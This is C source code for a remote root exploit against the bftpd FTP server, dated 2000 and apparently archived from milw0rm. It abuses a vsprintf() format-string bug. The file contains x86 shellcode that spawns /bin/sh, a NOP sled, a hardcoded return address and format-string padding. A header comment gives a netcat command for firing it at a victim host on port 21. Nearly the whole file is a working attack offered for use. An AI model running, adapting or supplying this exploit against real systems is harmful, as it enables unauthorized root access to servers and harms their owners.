/* * Copyright (c) 2000 - Security.is * * The following material may be freely redistributed, provided * that the code or the disclaimer have not been partly removed, * altered or modified in any way. The material is the property * of security.is. You are allowed to adopt the represented code * in your programs, given that you give credits where it's due. * * A no-name ftp-server has a serious bug which leads to remote root. * Anyway, we exploit vsprintf() via format-string. * * Discovered/coded by: DiGiT - [email protected] * Greets: security.is, ADM * note: Coded during security.is weekend ;> * * Run like: (./bftpexp ; cat) | nc bftpd.victim.com 21 * offset is optional and is arg1 * */ #include <stdio.h> char shellcode[] = "\x31\xc0\x31\xdb\x04\x0b\xcd\x80\x31\xc0\x40\x40\xcd\x80\x85" "\xc0\x75\x28\x89\xd9\x31\xc0\x41\x04\x3f\xcd\x80\x31\xc0\x04" "\x3f\x41\xeb\x1f\x31\xc0\x5f\x89\x7f\x08\x88\x47\x07\x89\x47" "\x0c\x89\xfb\x8d\x4f\x08\x8d\x57\x0c\x04\x0b\xcd\x80\x31\xc0" "\x31\xdb\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; #define ADDR 0xbffff83c int main(int argc, char *argv[]) { char lenbuf[1024],nopbuf[256], addrbuf[32], buf[256]; int offset=0,length, nopcount=100,i; long nop_addr = ADDR; if(argc > 1) offset = atoi(argv[1]); memset (nopbuf, '\x90', nopcount); nop_addr = nop_addr + offset; strcpy(buf, nopbuf); strcat(buf, shellcode); length=1024-strlen(shellcode)-nopcount+4-14; strcat(buf, "%."); sprintf(lenbuf, "%dd", length); strcat(buf, lenbuf); sprintf(addrbuf, "%c%c%c%c", (unsigned char) ((nop_addr >> 0) & 0xff), (unsigned char) ((nop_addr >> 8) & 0xff), (unsigned char) ((nop_addr >> 16) & 0xff), (unsigned char) ((nop_addr >> 24) & 0xff)); for(i = 0 ; i < 4 ; i++) strcat(buf, addrbuf); fprintf(stderr, "Bftpd remote exploit, by DiGiT\n"); fprintf(stderr, "Using Address = 0x%x\n", nop_addr); printf("%s\n", buf); return 0; } // milw0rm.com [2000-11-29]